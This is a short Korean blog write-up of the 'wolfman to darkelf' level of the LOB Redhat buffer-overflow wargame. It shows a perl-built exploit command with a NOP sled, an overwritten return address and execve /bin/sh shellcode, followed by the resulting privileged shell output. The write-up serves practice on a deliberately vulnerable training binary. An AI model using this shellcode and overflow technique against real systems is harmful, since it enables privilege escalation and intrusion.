이전 문제에 buf의 길이검증을 하는 코드가 추가되었다.
그러나 48보다 커야 에러가 뜨며 48이면 ret까지 변조가 충분히 가능하기 때문에
전에 썻던 payload를 그대로 사용하면 되겠다.
공격!
[wolfman@localhost wolfman]$ bash2
[wolfman@localhost wolfman]$ ./darkelf `perl -e 'print "\x90"x44,"\xff\xfd\xff\xbf"'` `perl -e 'print "\x90"x10000,
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱?
풺ash$ id
uid=505(wolfman) gid=505(wolfman) euid=506(darkelf) egid=506(darkelf) groups=505(wolfman)
bash$ my-pass
euid = 506
kernel crashed
'wargame > LOB Redhat' 카테고리의 다른 글
| orge to troll (0) | 2014.05.27 |
|---|---|
| darkelf to orge (0) | 2014.05.27 |
| orc to wolfman (0) | 2014.05.27 |
| goblin to orc (0) | 2014.05.27 |
| cobolt to goblin (0) | 2014.05.14 |